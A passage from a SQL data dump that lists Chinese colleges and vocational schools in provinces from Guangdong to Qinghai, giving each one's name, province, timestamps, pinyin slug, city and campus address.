22:14:07',NULL,'guangdongligongxueyuan',0,'肇庆','高要区祈福大道',0,NULL,NULL),(2904,'东莞理工学院城市学院','广东','2017-09-12 17:30:06','2017-10-13 22:14:07',NULL,'dongguanligongxueyuanchengshixueyuan',0,'东莞','寮步镇文昌路1号 ',0,NULL,NULL),(2905,'中山大学新华学院','广东','2017-09-12 17:30:46','2017-10-13 22:14:07',NULL,'zhongshandaxuexinhuaxueyuan',0,'广州','天河区龙洞华美路',0,NULL,NULL),(2906,'香港中文大学(深圳)','广东','2017-09-12 17:31:02','2017-10-13 22:14:07',NULL,'xianggangzhongwendaxueshenzhen',0,'深圳','龙岗区龙翔大道2001号',0,NULL,NULL),(2907,'深圳北理莫斯科大学','广东','2017-09-12 17:32:46','2017-10-13 22:14:07',NULL,'shenzhenbeilimosikedaxue',0,'深圳','龙岗区如意路299号',0,NULL,NULL),(2908,'广东以色列理工学院','广东','2017-09-12 17:33:08','2017-10-13 22:14:07',NULL,'guangdongyiselieligongxueyuan',0,'汕头','金平区G206(烟汕线)',0,NULL,NULL),(2909,'广东工商职业学院','广东','2017-09-12 17:33:34','2017-10-13 22:14:07',NULL,'guangdonggongshangzhiyexueyuan',0,'肇庆','七星岩旅游景区',0,NULL,NULL),(2910,'广东生态工程职业学院','广东','2017-09-12 17:34:01','2017-10-13 22:14:07',NULL,'guangdongshengtaigongchengzhiyexueyuan',0,'广州','天河区广汕一路297号',0,NULL,NULL),(2911,'惠州城市职业学院','广东','2017-09-12 17:36:50','2017-10-13 22:14:07',NULL,'huizhouchengshizhiyexueyuan',0,'惠州','惠城区三栋镇福长岭惠南大道明德路1号',0,NULL,NULL),(2912,'广东碧桂园职业学院','广东','2017-09-12 17:37:30','2017-10-13 22:14:07',NULL,'guangdongbiguiyuanzhiyexueyuan',0,'清远','清城区东城街蟠龙园',0,NULL,NULL),(2913,'公安边防部队高等专科学校','广东','2017-09-12 17:41:24','2017-10-13 22:14:07',NULL,'gonganbianfangbuduigaodengzhuankexuexiao',0,'广州','广州',0,NULL,NULL),(2914,'广东茂名健康职业学院','广东','2017-09-12 17:41:47','2017-10-13 22:14:07',NULL,'guangdongmaomingjiankangzhiyexueyuan',0,'茂名','电白区水东镇安乐东路28号',0,NULL,NULL),(2915,'广东酒店管理职业技术学院','广东','2017-09-12 17:42:09','2017-10-13 22:14:07',NULL,'guangdongjiudianguanlizhiyejishuxueyuan',0,'东莞','学府路',0,NULL,NULL),(2916,'广东茂名幼儿师范专科学校','广东','2017-09-12 17:42:32','2017-10-13 22:14:07',NULL,'guangdongmaomingyouershifanzhuankexuexiao',0,'茂名','高州市其他高师路43号',0,NULL,NULL),(2917,'广州卫生职业技术学院','广东','2017-09-12 17:47:16','2017-10-13 22:14:07',NULL,'guangzhouweishengzhiyejishuxueyuan',0,'广州','人民政府',0,NULL,NULL),(2918,'惠州工程职业学院','广东','2017-09-12 17:47:48','2017-10-13 22:14:07',NULL,'huizhougongchengzhiyexueyuan',0,'惠州','汤泉金泉路300号',0,NULL,NULL),(2919,'广东江门中医药职业学院','广东','2017-09-12 17:48:19','2017-10-13 22:14:07',NULL,'guangdongjiangmenzhongyiyaozhiyexueyuan',0,'江门','蓬江区龙湾路4号',0,NULL,NULL),(2920,'湛江幼儿师范专科学校','广东','2017-09-12 17:48:45','2017-10-13 22:14:07',NULL,'zhanjiangyouershifanzhuankexuexiao',0,'湛江','麻章区教育基地',0,NULL,NULL),(2921,'广西科技师范学院','广西','2017-09-12 17:49:19','2017-10-13 22:14:07',NULL,'guangxikejishifanxueyuan',0,'南宁','来宾市兴宾区铁北大道966号',0,NULL,NULL),(2922,'广西警察学院','广西','2017-09-12 17:49:39','2017-10-13 22:14:07',NULL,'guangxijingchaxueyuan',0,'南宁','长湖路6号',0,NULL,NULL),(2923,'广西大学行健文理学院','广西','2017-09-12 17:49:59','2017-10-13 22:14:07',NULL,'guangxidaxuexingjianwenlixueyuan',0,'南宁','秀灵路75号(秀厢大道西段)',0,NULL,NULL),(2924,'广西科技大学鹿山学院','广西','2017-09-12 17:50:22','2017-10-13 22:14:07',NULL,'guangxikejidaxuelushanxueyuan',0,'柳州','鱼峰区新柳大道99号',0,NULL,NULL),(2925,'广西民族大学相思湖学院','广西','2017-09-12 17:50:46','2017-10-13 22:14:07',NULL,'guangximinzudaxuexiangsihuxueyuan',0,'南宁','西乡塘区鹏飞路北段1号',0,NULL,NULL),(2926,'广西师范大学漓江学院','广西','2017-09-12 17:51:48','2017-10-13 22:14:07',NULL,'guangxishifandaxuelijiangxueyuan',0,'桂林','雁山区雁山镇雁中路3号',0,NULL,NULL),(2927,'广西师范学院师园学院','广西','2017-09-12 17:52:11','2017-10-13 22:14:07',NULL,'guangxishifanxueyuanshiyuanxueyuan',0,'南宁','江南区明阳工业园明阳大道15',0,NULL,NULL),(2928,'广西中医药大学赛恩斯新医药学院','广西','2017-09-12 17:52:37','2017-10-13 22:14:07',NULL,'guangxizhongyiyaodaxuesaiensixinyiyaoxueyuan',0,'南宁','青秀区广西中医药大学仙葫校区五合大道13号',0,NULL,NULL),(2929,'桂林电子科技大学信息科技学院','广西','2017-09-12 17:53:00','2017-10-13 22:14:07',NULL,'guilindianzikejidaxuexinxikejixueyuan',0,'桂林','七星区六合路',0,NULL,NULL),(2930,'桂林理工大学博文管理学院','广西','2017-09-12 17:53:23','2017-10-13 22:14:07',NULL,'guilinligongdaxuebowenguanlixueyuan',0,'桂林','雁山区雁山街317号',0,NULL,NULL),(2931,'北京航空航天大学北海学院','广西','2017-09-12 17:53:45','2017-10-13 22:14:07',NULL,'beijinghangkonghangtiandaxuebeihaixueyuan',0,'北海','银海区银滩大道88号',0,NULL,NULL),(2932,'广西金融职业技术学院','广西','2017-09-12 17:54:02','2017-10-13 22:14:07',NULL,'guangxijinrongzhiyejishuxueyuan',0,'南宁','大学东路91号',0,NULL,NULL),(2933,'广西中远职业学院','广西','2017-09-12 17:54:31','2017-10-13 22:14:07',NULL,'guangxizhongyuanzhiyexueyuan',0,'南宁','新宁镇龙华中学斜对面',0,NULL,NULL),(2934,'玉柴职业技术学院','广西','2017-09-12 17:55:06','2017-10-13 22:14:07',NULL,'yuchaizhiyejishuxueyuan',0,'玉林','玉州区二环南路',0,NULL,NULL),(2935,'广西蓝天航空职业学院','广西','2017-09-12 17:55:32','2017-10-13 22:14:07',NULL,'guangxilantianhangkongzhiyexueyuan',0,'南宁','来宾市兴宾区北大道968号',0,NULL,NULL),(2936,'广西安全工程职业技术学院','广西','2017-09-12 17:55:52','2017-10-13 22:14:07',NULL,'guangxianquangongchengzhiyejishuxueyuan',0,'南宁','武鸣区教育园区',0,NULL,NULL),(2937,'海南热带海洋学院','海南','2017-09-13 15:00:14','2017-10-13 22:14:07',NULL,'hainanredaihaiyangxueyuan',0,'三亚','吉阳区育才路1号',0,NULL,NULL),(2938,'海南体育职业技术学院','海南','2017-09-13 15:06:45','2017-10-13 22:14:07',NULL,'hainantiyuzhiyejishuxueyuan',0,'海口','歌舞剧院附近',0,NULL,NULL),(2939,'三亚中瑞酒店管理职业学院','海南','2017-09-13 15:24:03','2017-10-13 22:14:07',NULL,'sanyazhongruijiudianguanlizhiyexueyuan',0,'三亚','湾坡路108号',0,NULL,NULL),(2940,'重庆工程学院','重庆','2017-09-13 15:24:29','2017-10-13 22:14:07',NULL,'zhongqinggongchengxueyuan',0,'巴南','南泉镇白鹤林16号',0,NULL,NULL),(2941,'重庆大学城市科技学院','重庆','2017-09-13 15:24:52','2017-10-13 22:14:07',NULL,'zhongqingdaxuechengshikejixueyuan',0,'永川','光彩大道368号',0,NULL,NULL),(2942,'四川外国语大学重庆南方翻译学院','重庆','2017-09-13 15:26:17','2017-10-13 22:14:07',NULL,'sichuanwaiguoyudaxuezhongqingnanfangfanyixueyuan',0,'渝北','重庆市渝北区回兴街道、重庆市綦江区文龙街道',0,NULL,NULL),(2943,'重庆师范大学涉外商贸学院','重庆','2017-09-13 15:26:57','2017-10-13 22:14:07',NULL,'zhongqingshifandaxueshewaishangmaoxueyuan',0,'合川','学府路9号',0,NULL,NULL),(2944,'重庆工商大学融智学院','重庆','2017-09-13 15:27:31','2017-10-13 22:14:07',NULL,'zhongqinggongshangdaxuerongzhixueyuan',0,'巴南','龙洲湾街道尚文大道906号',0,NULL,NULL),(2945,'重庆工商大学派斯学院','重庆','2017-09-13 15:28:00','2017-10-13 22:14:07',NULL,'zhongqinggongshangdaxuepaisixueyuan',0,'合川','交通街593号',0,NULL,NULL),(2946,'重庆邮电大学移通学院','重庆','2017-09-13 15:28:17','2017-10-13 22:14:07',NULL,'zhongqingyoudiandaxueyitongxueyuan',0,'合川','假日大道1号',0,NULL,NULL),(2947,'重庆应用技术职业学院','重庆','2017-09-13 15:28:40','2017-10-13 22:14:07',NULL,'zhongqingyingyongjishuzhiyexueyuan',0,'合川','大学园区思源路60号(邮编:401520)',0,NULL,NULL),(2948,'重庆科技职业学院','重庆','2017-09-13 15:28:57','2017-10-13 22:14:07',NULL,'zhongqingkejizhiyexueyuan',0,'万州','滨河路10号',0,NULL,NULL),(2949,'重庆资源与环境保护职业学院','重庆','2017-09-13 15:30:10','2017-10-13 22:14:07',NULL,'zhongqingziyuanyuhuanjingbaohuzhiyexueyuan',0,'大足','南环二路一号',0,NULL,NULL),(2950,'重庆护理职业学院','重庆','2017-09-13 15:31:37','2017-10-13 22:14:07',NULL,'zhongqinghulizhiyexueyuan',0,'壁山','来凤街道解放东路600号',0,NULL,NULL),(2951,'西南医科大学','四川','2017-09-13 15:32:07','2017-10-13 22:14:07',NULL,'xinanyikedaxue',0,'泸州','龙马潭区香林路1段1号',0,NULL,NULL),(2952,'电子科技大学成都学院','四川','2017-09-13 15:32:28','2017-10-13 22:14:07',NULL,'dianzikejidaxuechengduxueyuan',0,'成都','高新西区百叶路1号',0,NULL,NULL),(2953,'成都理工大学工程技术学院','四川','2017-09-13 15:32:57','2017-10-13 22:14:07',NULL,'chengduligongdaxuegongchengjishuxueyuan',0,'乐山','中区肖坝路222号',0,NULL,NULL),(2954,'成都信息工程大学银杏酒店管理学院','四川','2017-09-13 15:33:16','2017-10-13 22:14:07',NULL,'chengduxinxigongchengdaxueyinxingjiudianguanlixueyuan',0,'成都','郫都区红光镇广场路北二段60号',0,NULL,NULL),(2955,'成都文理学院','四川','2017-09-13 15:33:41','2017-10-13 22:14:07',NULL,'chengduwenlixueyuan',0,'成都','金堂县学府大道278号(邮编:610401) ',0,NULL,NULL),(2956,'四川工商学院','四川','2017-09-13 15:34:13','2017-10-13 22:14:07',NULL,'sichuangongshangxueyuan',0,'成都','郫都区团结镇学院街65号、眉山市东坡区眉州大道岷东段9号',0,NULL,NULL),(2957,'四川外国语大学成都学院','四川','2017-09-13 15:34:31','2017-10-13 22:14:07',NULL,'sichuanwaiguoyudaxuechengduxueyuan',0,'成都','都江堰市大观镇高尔夫大道367号',0,NULL,NULL),(2958,'四川大学锦城学院','四川','2017-09-13 15:34:48','2017-10-13 22:14:07',NULL,'sichuandaxuejinchengxueyuan',0,'成都','高新西区西源大道1号',0,NULL,NULL),(2959,'西南财经大学天府学院','四川','2017-09-13 15:36:05','2017-10-13 22:14:07',NULL,'xinancaijingdaxuetianfuxueyuan',0,'绵阳','涪城区园兴西街2号 ',0,NULL,NULL),(2960,'四川大学锦江学院','四川','2017-09-13 15:36:28','2017-10-13 22:14:07',NULL,'sichuandaxuejinjiangxueyuan',0,'眉山','彭山区锦江大道1号',0,NULL,NULL),(2961,'四川文化艺术学院','四川','2017-09-13 15:36:49','2017-10-13 22:14:07',NULL,'sichuanwenhuayishuxueyuan',0,'绵阳','经济技术开发区机场东路83号(绵阳校区)',0,NULL,NULL),(2962,'西南科技大学城市学院','四川','2017-09-13 15:37:11','2017-10-13 22:14:07',NULL,'xinankejidaxuechengshixueyuan',0,'绵阳','游仙区三星路11号、安州区滨河路',0,NULL,NULL),(2963,'西南交通大学希望学院','四川','2017-09-13 15:37:50','2017-10-13 22:14:07',NULL,'xinanjiaotongdaxuexiwangxueyuan',0,'成都','金堂县三星镇学府大道8号',0,NULL,NULL),(2964,'四川电影电视学院','四川','2017-09-13 15:38:11','2017-10-13 22:14:07',NULL,'sichuandianyingdianshixueyuan',0,'成都','金牛区西华大道593号,四川省成都市大邑县安仁镇金山路188号',0,NULL,NULL),(2965,'川南幼儿师范高等专科学校','四川','2017-09-13 15:38:52','2017-10-13 22:14:07',NULL,'chuannanyouershifangaodengzhuankexuexiao',0,'内江','隆昌市古湖街道人民中路C段 ',0,NULL,NULL),(2966,'四川护理职业学院','四川','2017-09-13 15:39:15','2017-10-13 22:14:07',NULL,'sichuanhulizhiyexueyuan',0,'德阳','一环路东一段199号',0,NULL,NULL),(2967,'成都工业职业技术学院','四川','2017-09-13 15:39:36','2017-10-13 22:14:07',NULL,'chengdugongyezhiyejishuxueyuan',0,'成都','天府新区正兴街道大安路818号',0,NULL,NULL),(2968,'四川西南航空职业学院','四川','2017-09-13 15:40:05','2017-10-13 22:14:07',NULL,'sichuanxinanhangkongzhiyexueyuan',0,'成都','金堂大学城学府大道996号',0,NULL,NULL),(2969,'成都工贸职业技术学院','四川','2017-09-13 15:40:21','2017-10-13 22:14:07',NULL,'chengdugongmaozhiyejishuxueyuan',0,'成都','郫县红光镇广场路北三段188号',0,NULL,NULL),(2970,'四川应用技术职业学院','四川','2017-09-13 15:41:12','2017-10-13 22:14:07',NULL,'sichuanyingyongjishuzhiyexueyuan',0,'西昌','太和路教育卫生园区',0,NULL,NULL),(2971,'贵州医科大学','贵州','2017-09-13 15:41:34','2017-10-13 22:14:07',NULL,'guizhouyikedaxue',0,'贵阳','云岩区北京路9号',0,NULL,NULL),(2972,'贵州工程应用技术学院','贵州','2017-09-13 15:42:02','2017-10-13 22:14:07',NULL,'guizhougongchengyingyongjishuxueyuan',0,'毕节','七星关区学院路',0,NULL,NULL),(2973,'贵州警察学院','贵州','2017-09-13 15:42:33','2017-10-13 22:14:07',NULL,'guizhoujingchaxueyuan',0,'贵阳','龙洞堡见龙洞路132',0,NULL,NULL),(2974,'贵阳中医学院时珍学院','贵州','2017-09-13 15:43:12','2017-10-13 22:14:07',NULL,'guiyangzhongyixueyuanshizhenxueyuan',0,'贵阳','富源南路548号',0,NULL,NULL),(2975,'贵州财经大学商务学院','贵州','2017-09-13 15:49:29','2017-10-13 22:14:07',NULL,'guizhoucaijingdaxueshangwuxueyuan',0,'贵阳','惠水县建设西路',0,NULL,NULL),(2976,'贵州大学科技学院','贵州','2017-09-13 15:51:02','2017-10-13 22:14:07',NULL,'guizhoudaxuekejixueyuan',0,'贵阳','花溪区霞晖路',0,NULL,NULL),(2977,'贵州大学明德学院','贵州','2017-09-13 15:51:53','2017-10-13 22:14:07',NULL,'guizhoudaxuemingdexueyuan',0,'贵阳','新添大道南段598号',0,NULL,NULL),(2978,'贵州民族大学人文科技学院','贵州','2017-09-13 15:52:20','2017-10-13 22:14:07',NULL,'guizhouminzudaxuerenwenkejixueyuan',0,'贵阳','花溪区',0,NULL,NULL),(2979,'贵州师范大学求是学院','贵州','2017-09-13 15:53:37','2017-10-13 22:14:07',NULL,'guizhoushifandaxueqiushixueyuan',0,'贵阳','白云区白云北路397号',0,NULL,NULL),(2980,'遵义医学院医学与科技学院','贵州','2017-09-13 15:54:34','2017-10-13 22:14:07',NULL,'zunyiyixueyuanyixueyukejixueyuan',0,'遵义','新蒲新区学府西路6号',0,NULL,NULL),(2981,'贵州医科大学神奇民族医药学院','贵州','2017-09-13 15:54:57','2017-10-13 22:14:07',NULL,'guizhouyikedaxueshenqiminzuyiyaoxueyuan',0,'贵阳','龙洞堡笋子林3号',0,NULL,NULL),(2982,'茅台学院','贵州','2017-09-13 15:55:24','2017-10-13 22:14:07',NULL,'maotaixueyuan',0,'遵义','仁怀市S208',0,NULL,NULL),(2983,'贵州城市职业学院','贵州','2017-09-13 15:55:45','2017-10-13 22:14:07',NULL,'guizhouchengshizhiyexueyuan',0,'贵阳','花溪区鸿源路8号',0,NULL,NULL),(2984,'黔南民族幼儿师范高等专科学校','贵州','2017-09-13 15:56:49','2017-10-13 22:14:07',NULL,'qiannanminzuyouershifangaodengzhuankexuexiao',0,'贵阳','贵定县金南街道金南大道(新校区);贵定县城关镇河滨西路53号(老校区);独山县独山大学城西(西校区)',0,NULL,NULL),(2985,'毕节医学高等专科学校','贵州','2017-09-13 15:57:28','2017-10-13 22:14:07',NULL,'bijieyixuegaodengzhuankexuexiao',0,'毕节','职教城',0,NULL,NULL),(2986,'贵州建设职业技术学院','贵州','2017-09-13 16:03:59','2017-10-13 22:14:07',NULL,'guizhoujianshezhiyejishuxueyuan',0,'贵阳','清镇市职教园区东区',0,NULL,NULL),(2987,'毕节幼儿师范高等专科学校','贵州','2017-09-13 16:04:27','2017-10-13 22:14:07',NULL,'bijieyouershifangaodengzhuankexuexiao',0,'毕节','双山新区职教城',0,NULL,NULL),(2988,'贵州农业职业学院','贵州','2017-09-13 16:07:12','2017-10-13 22:14:07',NULL,'guizhounongyezhiyexueyuan',0,'贵阳','清镇市云站路',0,NULL,NULL),(2989,'贵州工程职业学院','贵州','2017-09-13 16:09:12','2017-10-13 22:14:07',NULL,'guizhougongchengzhiyexueyuan',0,'铜仁','德江县城南新区',0,NULL,NULL),(2990,'贵州工贸职业学院','贵州','2017-09-13 16:09:51','2017-10-13 22:14:07',NULL,'guizhougongmaozhiyexueyuan',0,'毕节','咸宁县滨海大道777号',0,NULL,NULL),(2991,'贵州水利水电职业技术学院','贵州','2017-09-13 16:31:44','2017-10-13 22:14:07',NULL,'guizhoushuilishuidianzhiyejishuxueyuan',0,'贵阳','清镇市',0,NULL,NULL),(2992,'贵州电子商务职业技术学院','贵州','2017-09-13 16:32:04','2017-10-13 22:14:07',NULL,'guizhoudianzishangwuzhiyejishuxueyuan',0,'贵阳','站街镇云站路',0,NULL,NULL),(2993,'贵州应用技术职业学院','贵州','2017-09-13 16:32:29','2017-10-13 22:14:07',NULL,'guizhouyingyongjishuzhiyexueyuan',0,'贵阳','黔南布依族苗族自治州福泉市金鸡山东路与福源大道交叉口',0,NULL,NULL),(2994,'贵州电子科技职业学院','贵州','2017-09-13 16:33:06','2017-10-13 22:14:07',NULL,'guizhoudianzikejizhiyexueyuan',0,'贵阳','贵安新区马场科技新城龙潭路1号',0,NULL,NULL),(2995,'贵州装备制造职业学院','贵州','2017-09-13 16:33:39','2017-10-13 22:14:07',NULL,'guizhouzhuangbeizhizaozhiyexueyuan',0,'贵阳','观山湖区云潭南路',0,NULL,NULL),(2996,'贵州健康职业学院','贵州','2017-09-13 16:34:00','2017-10-13 22:14:07',NULL,'guizhoujiankangzhiyexueyuan',0,'铜仁','碧江区滨江大道',0,NULL,NULL),(2997,'贵州食品工程职业学院','贵州','2017-09-13 16:34:18','2017-10-13 22:14:07',NULL,'guizhoushipingongchengzhiyexueyuan',0,'贵阳','双桥路',0,NULL,NULL),(2998,'贵州经贸职业技术学院','贵州','2017-09-13 16:34:43','2017-10-13 22:14:07',NULL,'guizhoujingmaozhiyejishuxueyuan',0,'都匀','黔南布依族苗族自治州都匀市甘塘镇邦水村',0,NULL,NULL),(2999,'贵州护理职业技术学院','贵州','2017-09-13 16:34:58','2017-10-13 22:14:07',NULL,'guizhouhulizhiyejishuxueyuan',0,'贵阳','白云北路29号',0,NULL,NULL),(3000,'贵州航空职业技术学院','贵州','2017-09-13 16:35:17','2017-10-13 22:14:07',NULL,'guizhouhangkongzhiyejishuxueyuan',0,'贵阳','花溪区小孟社区贵航高级技工学校',0,NULL,NULL),(3001,'云南大学滇池学院','云南','2017-09-13 16:35:45','2017-10-13 22:14:07',NULL,'yunnandaxuedianchixueyuan',0,'昆明','杨林职教园区文博路',0,NULL,NULL),(3002,'云南大学旅游文化学院','云南','2017-09-13 16:36:16','2017-10-13 22:14:07',NULL,'yunnandaxuelvyouwenhuaxueyuan',0,'丽江','古城区玉泉路',0,NULL,NULL),(3003,'昆明理工大学津桥学院','云南','2017-09-13 16:36:42','2017-10-13 22:14:07',NULL,'kunmingligongdaxuejinqiaoxueyuan',0,'昆明','国家高新技术产业开发区海源北路1268号',0,NULL,NULL),(3004,'云南师范大学商学院','云南','2017-09-13 16:37:05','2017-10-13 22:14:07',NULL,'yunnanshifandaxueshangxueyuan',0,'昆明','高新区商院路1号 杨林校区:昆明市嵩明职教基地文林路',0,NULL,NULL),(3005,'云南师范大学文理学院','云南','2017-09-13 16:37:34','2017-10-13 22:14:07',NULL,'yunnanshifandaxuewenlixueyuan',0,'昆明','嵩明职教基地',0,NULL,NULL),(3006,'昆明医科大学海源学院','云南','2017-09-13 16:37:47','2017-10-13 22:14:07',NULL,'kunmingyikedaxuehaiyuanxueyuan',0,'昆明','高新技术开发区海源北路389号',0,NULL,NULL),(3007,'云南艺术学院文华学院','云南','2017-09-13 16:38:24','2017-10-13 22:14:07',NULL,'yunnanyishuxueyuanwenhuaxueyuan',0,'昆明','安宁市职教园区 ',0,NULL,NULL),(3008,'滇西科技师范学院','云南','2017-09-13 16:38:44','2017-10-13 22:14:07',NULL,'dianxikejishifanxueyuan',0,'临沧','临翔区学府路2号',0,NULL,NULL),(3009,'滇西应用技术大学','云南','2017-09-13 16:39:09','2017-10-13 22:14:07',NULL,'dianxiyingyongjishudaxue',0,'大理','大理州大理市海东镇',0,NULL,NULL),(3010,'公安消防部队高等专科学校','云南','2017-09-13 16:39:28','2017-10-13 22:14:07',NULL,'gonganxiaofangbuduigaodengzhuankexuexiao',0,'昆明','国家经济技术开发区',0,NULL,NULL),(3011,'云南财经职业学院','云南','2017-09-13 16:39:53','2017-10-13 22:14:07',NULL,'yunnancaijingzhiyexueyuan',0,'昆明','五华区龙泉路408号',0,NULL,NULL),(3012,'昆明铁道职业技术学院','云南','2017-09-13 16:40:11','2017-10-13 22:14:07',NULL,'kunmingtiedaozhiyejishuxueyuan',0,'昆明','阿拉彝族乡小石坝村16号',0,NULL,NULL),(3013,'昭通卫生职业学院','云南','2017-09-13 16:40:43','2017-10-13 22:14:07',NULL,'zhaotongweishengzhiyexueyuan',0,'昭通','昭阳区太平街道办事处桃源社区',0,NULL,NULL),(3014,'大理护理职业学院','云南','2017-09-13 16:41:11','2017-10-13 22:14:07',NULL,'dalihulizhiyexueyuan',0,'大理','大理白族自治州大理市',0,NULL,NULL),(3015,'云南水利水电职业学院','云南','2017-09-13 16:41:27','2017-10-13 22:14:07',NULL,'yunnanshuilishuidianzhiyexueyuan',0,'昆明','富民县上西邑134号',0,NULL,NULL),(3016,'云南轻纺职业学院','云南','2017-09-13 16:41:49','2017-10-13 22:14:07',NULL,'yunnanqingfangzhiyexueyuan',0,'昆明','七花北路8号',0,NULL,NULL),(3017,'云南特殊教育职业学院','云南','2017-09-13 16:42:07','2017-10-13 22:14:07',NULL,'yunnanteshujiaoyuzhiyexueyuan',0,'昆明','吴家营街道',0,NULL,NULL),(3018,'云南工贸职业技术学院','云南','2017-09-13 16:42:39','2017-10-13 22:14:07',NULL,'yunnangongmaozhiyejishuxueyuan',0,'昆明','昆明',0,NULL,NULL),(3019,'云南交通运输职业学院','云南','2017-09-13 16:43:55','2017-10-13 22:14:07',NULL,'yunnanjiaotongyunshuzhiyexueyuan',0,'昆明','安宁市宁湖西路8号',0,NULL,NULL),(3020,'西藏农牧学院','西藏','2017-09-13 16:44:14','2017-10-13 22:14:07',NULL,'xicangnongmuxueyuan',0,'林芝','巴宜区学院路',0,NULL,NULL),(3021,'陕西中医药大学','陕西','2017-09-13 16:44:50','2017-10-13 22:14:07',NULL,'shanxizhongyiyaodaxue',0,'咸阳','世纪大道中段1号',0,NULL,NULL),(3022,'西安交通工程学院','陕西','2017-09-13 16:45:29','2017-10-13 22:14:07',NULL,'xianjiaotonggongchengxueyuan',0,'西安','西安市鄠邑区渼陂西路1号',0,NULL,NULL),(3023,'西安交通大学城市学院','陕西','2017-09-13 16:45:53','2017-10-13 22:14:07',NULL,'xianjiaotongdaxuechengshixueyuan',0,'西安','未央区西安经济技术开发区草滩生态产',0,NULL,NULL),(3024,'西北大学现代学院','陕西','2017-09-13 16:46:30','2017-10-13 22:14:07',NULL,'xibeidaxuexiandaixueyuan',0,'西安','长安区滦镇科教园陈北路1号',0,NULL,NULL),(3025,'西安建筑科技大学华清学院','陕西','2017-09-13 16:46:47','2017-10-13 22:14:07',NULL,'xianjianzhukejidaxuehuaqingxueyuan',0,'西安','新城区幸福南路109号',0,NULL,NULL),(3026,'西安财经学院行知学院','陕西','2017-09-13 16:47:02','2017-10-13 22:14:07',NULL,'xiancaijingxueyuanxingzhixueyuan',0,'西安','灞桥区狄寨路57号',0,NULL,NULL),(3027,'陕西科技大学镐京学院','陕西','2017-09-13 16:47:28','2017-10-13 22:14:07',NULL,'shanxikejidaxuehaojingxueyuan',0,'西安','西咸新区沣西新城统一大道',0,NULL,NULL),(3028,'西安工业大学北方信息工程学院','陕西','2017-09-13 16:47:54','2017-10-13 22:14:07',NULL,'xiangongyedaxuebeifangxinxigongchengxueyuan',0,'西安','高陵区鹿祥路235号',0,NULL,NULL),(3029,'延安大学西安创新学院','陕西','2017-09-13 16:48:21','2017-10-13 22:14:07',NULL,'yanandaxuexianchuangxinxueyuan',0,'西安','长安区皂河路2号',0,NULL,NULL),(3030,'西安电子科技大学长安学院','陕西','2017-09-13 16:48:37','2017-10-13 22:14:07',NULL,'xiandianzikejidaxuechanganxueyuan',0,'西安','西沣路郭杜北段6号',0,NULL,NULL),(3031,'西北工业大学明德学院','陕西','2017-09-13 16:48:55','2017-10-13 22:14:07',NULL,'xibeigongyedaxuemingdexueyuan',0,'西安','长安区',0,NULL,NULL),(3032,'长安大学兴华学院','陕西','2017-09-13 16:54:15','2017-10-13 22:14:07',NULL,'changandaxuexinghuaxueyuan',0,'西安','富鱼路81号',0,NULL,NULL),(3033,'西安理工大学高科学院','陕西','2017-09-13 16:54:37','2017-10-13 22:14:07',NULL,'xianligongdaxuegaokexueyuan',0,'西安','南郊大学城子午大道南段',0,NULL,NULL),(3034,'西安科技大学高新学院','陕西','2017-09-13 16:54:54','2017-10-13 22:14:07',NULL,'xiankejidaxuegaoxinxueyuan',0,'西安','长安区子午大道中段39号',0,NULL,NULL),(3035,'陕西机电职业技术学院','陕西','2017-09-13 16:55:12','2017-10-13 22:14:07',NULL,'shanxijidianzhiyejishuxueyuan',0,'宝鸡','宝福路56号',0,NULL,NULL),(3036,'甘肃中医药大学','甘肃','2017-09-13 16:55:43','2017-10-13 22:14:07',NULL,'gansuzhongyiyaodaxue',0,'兰州','定西东路35号',0,NULL,NULL),(3037,'兰州财经大学','甘肃','2017-09-13 16:56:50','2017-10-13 22:14:06',NULL,'lanzhoucaijingdaxue',0,'兰州','薇乐大道4号和平校区',0,NULL,NULL),(3038,'甘肃医学院','甘肃','2017-09-13 16:57:21','2017-10-13 22:14:06',NULL,'gansuyixueyuan',0,'平凉','崆峒区柳湖中段',0,NULL,NULL),(3039,'西北师范大学知行学院','甘肃','2017-09-13 16:57:53','2017-10-13 22:14:06',NULL,'xibeishifandaxuezhixingxueyuan',0,'兰州','市安宁区长新路20号',0,NULL,NULL),(3042,'兰州财经大学陇桥学院','甘肃','2017-09-14 09:22:08','2017-10-13 22:14:06',NULL,'lanzhoucaijingdaxuelongqiaoxueyuan',0,'兰州','和平开发区薇乐大道',0,NULL,NULL),(3043,'兰州财经大学长青学院','甘肃','2017-09-14 09:22:28','2017-10-13 22:14:06',NULL,'lanzhoucaijingdaxuechangqingxueyuan',0,'兰州','城关区店子街45号',0,NULL,NULL),(3044,'兰州交通大学博文学院','甘肃','2017-09-14 09:22:55','2017-10-13 22:14:06',NULL,'lanzhoujiaotongdaxuebowenxueyuan',0,'兰州','和平开发区',0,NULL,NULL),(3045,'兰州理工大学技术工程学院','甘肃','2017-09-14 09:24:05','2017-10-13 22:14:06',NULL,'lanzhouligongdaxuejishugongchengxueyuan',0,'兰州','七里河区龚家坪北路211号',0,NULL,NULL),(3046,'甘肃卫生职业学院','甘肃','2017-09-14 09:27:39','2017-10-13 22:14:06',NULL,'gansuweishengzhiyexueyuan',0,'兰州','城关区',0,NULL,NULL),(3047,'兰州科技职业学院','甘肃','2017-09-14 09:28:18','2017-10-13 22:14:06',NULL,'lanzhoukejizhiyexueyuan',0,'兰州','东部科技新城园区大道1号',0,NULL,NULL),(3048,'庆阳职业技术学院','甘肃','2017-09-14 09:34:41','2017-10-13 22:14:06',NULL,'qingyangzhiyejishuxueyuan',0,'兰州','西环路附近',0,NULL,NULL),(3049,'临夏现代职业学院','甘肃','2017-09-14 09:49:04','2017-10-13 22:14:06',NULL,'linxiaxiandaizhiyexueyuan',0,'临夏','回族自治州临夏市',0,NULL,NULL),(3050,'甘肃能源化工职业学院','甘肃','2017-09-14 09:49:26','2017-10-13 22:14:06',NULL,'gansunengyuanhuagongzhiyexueyuan',0,'兰州','皋兰县X104',0,NULL,NULL),(3051,'兰州现代职业学院','甘肃','2017-09-14 09:50:11','2017-10-13 22:14:06',NULL,'lanzhouxiandaizhiyexueyuan',0,'兰州','皋兰县铧段公路',0,NULL,NULL),(3052,'平凉职业技术学院','甘肃','2017-09-14 09:50:36','2017-10-13 22:14:06',NULL,'pingliangzhiyejishuxueyuan',0,'平凉','泾河风情大道南100米',0,NULL,NULL),(3053,'甘肃财贸职业学院','甘肃','2017-09-14 09:51:03','2017-10-13 22:14:06',NULL,'gansucaimaozhiyexueyuan',0,'兰州','城关区秦安路28号',0,NULL,NULL),(3054,'青海大学昆仑学院','青海','2017-09-14 09:51:28','2017-10-13 